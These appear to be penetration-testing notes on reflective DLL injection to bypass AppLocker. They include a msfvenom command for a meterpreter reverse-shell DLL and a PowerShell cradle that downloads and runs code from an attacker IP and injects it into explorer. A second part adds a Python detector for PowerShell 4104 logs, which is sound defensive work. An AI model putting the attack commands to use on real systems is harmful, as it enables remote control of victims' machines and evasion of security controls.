Reflective DLL Injection

Bypass Applocker DLL rules

Host both met.dll + Invoke-ReflectivePEInjection.ps1

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 -f dll -o met.dll

Replace the cmd line from the Custom Runspaces example with:

String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.220.128/met.dll');(New-Object System.Net.WebClient).DownloadString('http://192.168.220.128/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";
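
Because the DLL is mapped from a byte array in memory rather than loaded from a file, AppLocker DLL rules never evaluate it; the command text is still recorded when PowerShell script block logging (event ID 4104) is enabled. The following is an added example, not part of the original notes: a Python triage function over 4104 ScriptBlockText values, where the names classify and scan, the indicator labels and the sample records are this example's own constructions.

```python
import re

# Indicator names are this example's own; the patterns come from the command above.
INDICATORS = {
    "webclient_download": re.compile(r"Net\.WebClient\)?\s*\.\s*Download(?:Data|String)\s*\(", re.I),
    "invoke_expression": re.compile(r"\|\s*IEX\b|\bInvoke-Expression\b", re.I),
    "reflective_pe_loader": re.compile(r"\bInvoke-ReflectivePEInjection\b", re.I),
    "pe_bytes_param": re.compile(r"(?<!\S)-PEBytes\b", re.I),
    "remote_process_param": re.compile(r"(?<!\S)-ProcId\b", re.I),
}

def classify(script_block: str) -> dict:
    """Score one 4104 ScriptBlockText value against the indicators."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(script_block)}
    loader = "reflective_pe_loader" in hits
    if loader and {"webclient_download", "pe_bytes_param"} <= hits:
        severity = "high"      # PE fetched into memory and handed to the loader
    elif loader:
        severity = "medium"    # loader referenced, delivery path not visible
    elif {"webclient_download", "invoke_expression"} <= hits:
        severity = "low"       # generic download cradle, no injection seen
    else:
        severity = "none"
    return {"severity": severity, "indicators": sorted(hits),
            "cross_process": "remote_process_param" in hits}

def scan(events: list) -> list:
    """Return (record_id, verdict) for every event that is not 'none'."""
    out = []
    for ev in events:
        verdict = classify(ev["ScriptBlockText"])
        if verdict["severity"] != "none":
            out.append((ev["RecordId"], verdict))
    return out

# Constructed sample records (not real logs); record 1 carries the page's command.
SAMPLE_EVENTS = [
    {"RecordId": 1, "ScriptBlockText": "$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.220.128/met.dll');(New-Object System.Net.WebClient).DownloadString('http://192.168.220.128/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid"},
    {"RecordId": 2, "ScriptBlockText": "(New-Object System.Net.WebClient).DownloadString('http://intranet.example/setup.ps1') | IEX"},
    {"RecordId": 3, "ScriptBlockText": "Get-Process -Name explorer | Select-Object Id"},
]

if __name__ == "__main__":
    for record_id, verdict in scan(SAMPLE_EVENTS):
        print(record_id, verdict)
```

Long scripts are split across several 4104 records, so reassemble them by ScriptBlockId before matching.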

Tooling
